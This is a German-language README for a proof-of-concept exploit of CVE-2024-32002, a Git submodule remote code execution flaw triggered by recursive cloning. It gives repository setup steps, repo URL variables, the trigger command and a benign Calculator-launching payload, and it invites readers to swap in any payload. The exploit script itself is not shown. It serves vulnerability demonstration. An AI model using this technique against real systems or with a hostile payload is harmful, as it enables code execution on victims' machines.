
POC
Dieses Repository enthält einen Proof of Concept (PoC) für CVE-2024-32002, eine Remote-Codeausführungs-Schwachstelle (RCE) in Git-Submodulen. Der Exploit zeigt, wie eine bösartige Nutzlast über ein rekursives Klonen eines Git-Repositorys ausgelöst werden kann.
Bevor Sie den PoC ausführen, erstellen Sie die folgenden Repositorys auf Ihrem Remote-Git-Server, oder ändern Sie die Namen nach Bedarf:
hulk.gitsubmod.gitsmash.gitAktualisieren Sie gegebenenfalls die Repository-Pfade im PoC-Skript, wenn Sie die Namen ändern.
Der Exploit nutzt Git-Submodule, um beim rekursiven Klonen des Repositorys eine Nutzlast auf dem Zielsystem auszuführen. Dieser PoC wurde unter macOS getestet.
HULK_REPO="[email protected]:safebuffer/hulk.git"
pullme_REPO="[email protected]:safebuffer/submod.git"
# Final Exploit Repo
SMASH_REPO="[email protected]:safebuffer/smash.git"
Um den Exploit auszulösen, führen Sie das Skript poc.sh aus und geben Sie anschließend den folgenden Befehl ein:
git clone --recursive $SMASH_REPO
Die Standard-Nutzlast in diesem PoC öffnet die Anwendung „Calculator“ unter macOS. Sie können diese durch eine beliebige Nutzlast Ihrer Wahl ersetzen.
/System/Applications/Calculator.app/Contents/MacOS/Calculator
Dieser PoC dient ausschließlich zu Bildungszwecken. Verwenden Sie ihn verantwortungsbewusst und nur auf Systemen, für die Sie ausdrücklich die Erlaubnis zum Testen haben. Ein Missbrauch dieses PoC kann schwerwiegende Folgen haben.